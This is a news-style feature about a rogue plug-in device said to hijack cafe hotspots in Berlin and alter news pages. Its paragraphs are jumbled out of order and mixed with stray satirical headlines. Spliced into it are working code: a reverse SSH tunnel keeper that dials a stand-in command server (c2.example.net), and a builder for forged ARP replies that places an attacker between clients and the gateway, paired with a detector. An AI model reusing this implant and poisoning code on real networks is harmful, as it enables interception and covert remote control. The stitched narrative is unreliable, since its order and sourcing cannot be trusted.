Security researchers from the Berlin-based firm Critical Engineering uncover the technology behind a small, seemingly harmless device that is causing havoc at hotspots throughout Europe. Lisa Miller reports from the German capital.
Many of us are familiar with this scene: starting the day with a muggachino while we catch up with news using the local wireless hotspot on our portable computer or smartphone.
This ritual, popular across cities throughout the western world, has recently come under threat from small, innocuous-looking devices 'infecting' cafes throughout Europe.
"I was checking an article I'd published the night before and noticed some bizarre irregularities. At first I thought they were typos but looking further I saw whole mis-citations of our Chancellor, Angela Merkel!
Embarrassed, I called my office and they said it all looked fine. In a rush to leave I reached under the chair to pull out my laptop plug and accidentally knocked this little box to the floor. I plugged it back in and apologised to the cafe owners. They said they'd never seen it before..."
One cafe owner asked a friend if he knew what it was. One thing led to another and soon enough the device was in the hands of the local police, who then called on Critical Engineering to unravel the mystery.
The device was hidden behind a chair at cafe Circus Lemke
The device opened up for inspection at Network Insecurity
The housing is around 12 cm in length and has a 'passthrough' power socket, accepting a stock-standard Euro plug.
With such cheap components, Kotla and his team were eager to find out just how the device worked. Wiring up the TX, RX and GND pins of the board's serial header, they were able to talk to the device using a Sparkfun USB-to-serial TTL module and the serial terminal program minicom.
The 7 x 5 cm board is an off-the-shelf GW-MF54G2 with an Atheros chipset, often sold under the 'Planex' or 'Abocom' brands and available for about EUR 30.00 from numerous distributors worldwide.
"If it were plugged into the wall, say under a bench at a cafe, you'd think it was part of the infrastructure..." remarks Kotla.
When plugged in, the device boots automatically and looks for an open wireless network, or for any network whose password it already knows, something often handed over for the price of a coffee. It then opens a reverse SSH tunnel, authenticating with an SSH key rather than a password, to a server abroad. A remote user logged into that server can SSH back through the tunnel into the device and issue commands as they see fit, even though the device itself sits behind the cafe's router with no reachable address of its own.
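The call-home described above, written out as an added example that is not code recovered from the device or written by Critical Engineering: the ssh invocation the implant would run, the command the operator runs on the server to reach it, and a loop that re-dials when the hotspot link drops. The server name c2.example.net, the ports, the key path and the account names are assumptions.

```python
"""Device-side reverse SSH tunnel keeper (constructed example, not the device's
own code; server name, ports, user names and key path are assumptions)."""
import shlex
import subprocess
import time


def build_tunnel_argv(server, server_port, remote_bind_port,
                      local_ssh_port=22, key_path="/root/.ssh/id_rsa", user="tunnel"):
    """ssh -N -R <remote_bind_port>:localhost:<local_ssh_port> user@server

    The device dials out, so the cafe router's NAT does not matter, and asks
    the server to listen on one of its own loopback ports. Whoever is logged
    into the server can then ssh to that port and land on the device.
    """
    return [
        "ssh", "-N",                        # forwarding only, no remote shell
        "-i", key_path,                     # key-based login; nothing interactive on a headless box
        "-p", str(server_port),
        "-o", "ExitOnForwardFailure=yes",   # exit (and get re-dialled) if the remote port is already bound
        "-o", "ServerAliveInterval=30",     # notice a dead hotspot link within about a minute
        "-o", "ServerAliveCountMax=2",
        "-o", "StrictHostKeyChecking=yes",  # the device carries the server's host key; refuse any other
        "-o", "BatchMode=yes",              # never block on a password or host-key prompt
        "-R", "%d:localhost:%d" % (remote_bind_port, local_ssh_port),
        "%s@%s" % (user, server),
    ]


def build_callback_argv(remote_bind_port, device_user="root"):
    """What the operator runs on the server to reach the device through the tunnel."""
    return ["ssh", "-p", str(remote_bind_port), "%s@localhost" % device_user]


def keep_alive(argv, runner=subprocess.call, sleep=time.sleep, max_attempts=None):
    """Re-dial the tunnel with capped exponential backoff.

    `runner` and `sleep` are injectable so the loop can be exercised without a
    network. Returns the number of attempts made (meaningful with max_attempts).
    """
    delay, attempts = 5, 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        exit_code = runner(argv)
        # a clean exit (tunnel closed by the server) resets the backoff; any error doubles it
        delay = 5 if exit_code == 0 else min(delay * 2, 300)
        sleep(delay)
    return attempts


if __name__ == "__main__":
    argv = build_tunnel_argv("c2.example.net", 443, 2222)
    print("device runs:  ", shlex.join(argv))
    print("operator runs:", shlex.join(build_callback_argv(2222)))
    # on the implant itself this would be: keep_alive(argv)
```

From the cafe's side the observable is a long-lived outbound SSH session from an unfamiliar device to one foreign host; the article's later remark that the operators route the tunnel over Tor would change what that host appears to be, not the fact that the device keeps dialling out.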
This however is just the beginning.
The device then tampers with the Address Resolution Protocol (ARP) tables of both the hotspot and the clients associated with it, iPhones, Android devices and laptop computers alike.
"They're using a 2048-bit SSH tunnel onion-routed over Tor nodes, so there's no way in hell we can find out where they are when this thing's plugged in," quips Kotla disdainfully. "We've tried to SSH into the remote machine but our attempts are refused. They're essentially manipulating public perception of world events and facts, as reported by dedicated journalists, and there's not much we can do about it."
Kotla may be wrong here, however: a Nokia N900 phone turned in at a police station in the area held a number of images of the device, along with these two photos, taken just minutes after one installation in a large Starbucks in the central district of Mitte, east Berlin. Note the black hat worn by what may be a colleague in the first photograph.
Berliner Zeitung political commentator Susanne Guthmann was puzzled to find her own article had been altered while at a West Berlin cafe.
What they encountered next surprised them indeed.
"It's nothing like anything we've ever encountered in the wild," says security expert Zdzislaw Kotla. "You plug it in near a hotspot, connect with your laptop or phone to the hotspot as normal and check the day's facts. A lot of them prove to be manipulated. Someone, somewhere is sending those changes to this little soldier."
A snippet of code researchers managed to retrieve from the device
The ARP table is a cache kept by every device on a local network. Vital for the network to function at all, it maps the IP address each device was handed by the access point to the hardware (MAC) address that frames are actually delivered to. The table is filled in from ARP replies, the answers to the small broadcast requests every device on a Local Area Network sends when it needs a neighbour's hardware address, and most implementations accept a reply whether or not they asked for one. By answering with false mappings, the rogue device can make a client believe the router's IP address belongs to the rogue device's hardware address, and make the router believe the same of the client, so that all traffic between the two passes through the rogue device.
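What the poisoning described above (and in the earlier paragraph on the hotspot and client tables) looks like on the wire, as an added example that is not code from the device or from Critical Engineering: a builder for the forged ARP reply, a parser for it, the pair of replies needed to sit between a client and the gateway, and a passive watcher of the kind a cafe could run that flags an IP address whose hardware address changes. Every address below is constructed.

```python
"""Forged ARP replies of the kind the rogue device sends, and a passive check
that spots them. Constructed example, not code recovered from the device;
every address below is made up."""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply that asserts 'sender_ip is at sender_mac'.

    A poisoning reply simply puts the attacker's MAC in sender_mac and the
    victim's gateway (or the gateway's client) in sender_ip. Most stacks
    overwrite their cache entry on receipt, whether or not they asked.
    """
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return ethernet + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return (opcode, mac_str(body[0:6]), ip_str(body[6:10]),
            mac_str(body[10:16]), ip_str(body[16:20]))


def poison_pair(attacker_mac, gateway_ip, gateway_mac, client_ip, client_mac):
    """The two replies that put the attacker between a client and the gateway:
    the client is told the gateway lives at the attacker's MAC, and the gateway
    is told the client does. The attacker then forwards (and can edit) both directions."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, client_mac, client_ip),
        build_arp_reply(attacker_mac, client_ip, gateway_mac, gateway_ip),
    ]


class ArpWatch:
    """Passive detector: remember the first MAC seen for each IP and flag replies that move it."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.table.get(sender_ip)
        if known is None:
            self.table[sender_ip] = sender_mac
            return None
        if known != sender_mac:
            alert = "%s moved from %s to %s" % (sender_ip, known, sender_mac)
            self.alerts.append(alert)
            return alert
        return None


def demo():
    """Constructed hotspot: one legitimate exchange, then the poisoning pair. Returns the alerts raised."""
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:55"
    client_ip, client_mac = "192.168.1.50", "aa:bb:cc:dd:ee:01"
    attacker_mac = "de:ad:be:ef:00:01"
    traffic = [
        build_arp_reply(gateway_mac, gateway_ip, client_mac, client_ip),  # genuine
        build_arp_reply(client_mac, client_ip, gateway_mac, gateway_ip),  # genuine
    ] + poison_pair(attacker_mac, gateway_ip, gateway_mac, client_ip, client_mac)
    watcher = ArpWatch()
    for frame in traffic:
        watcher.observe(frame)
    return watcher.alerts


if __name__ == "__main__":
    for alert in demo():
        print("ARP cache poisoning suspected:", alert)
```

Two caveats a practitioner would add: the watcher trusts whatever it sees first, so a rogue device that is already running when the watcher starts poisons the baseline itself, and an address legitimately handed to a new machine by DHCP also shows up as a "move". In practice the baseline is seeded from the DHCP lease table or a static list, and the more reliable sign is the gateway's address, which should never move at all.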
The device becomes the puppet master of the local network, able to intercept and modify all content...
The last section of the boot sequence on the device. Note antagonistic prompt message.
1. 12000 yr old bong found in space debris. Have we looped?
2. U.K. satirist Chris Morris to be knighted.
3. First 'Thoughtography' exploit demoed at 27th Chaos Computer Club congress in Berlin.
4. Apple's new 'Think Similar' campaign sees mass adoption in Education Sector.
5. The Great American Metaphor: why we can't stop saying "like" in every bloody sentence.
It all started in Berlin, when Susanne Guthmann, writer for the Berliner Zeitung, was catching up with a coffee and her own article at Circus Lemke, a popular cafe in the western suburb of Neukölln.
"The board's running a customised version of a GNU/Linux distribution normally intended for use on routers and embedded systems. What they've done with it is crazy..."
The developers use a sophisticated form of attack to gain control of the local network.
Researchers give a detailed demonstration of the Newstweek device, altering BBC News on a netbook, an Apple MacBook and a Nokia smartphone. Note the roughly 15-second boot time before changes take effect. Our less patient readers should scroll to 04:45 to see the manipulation at work.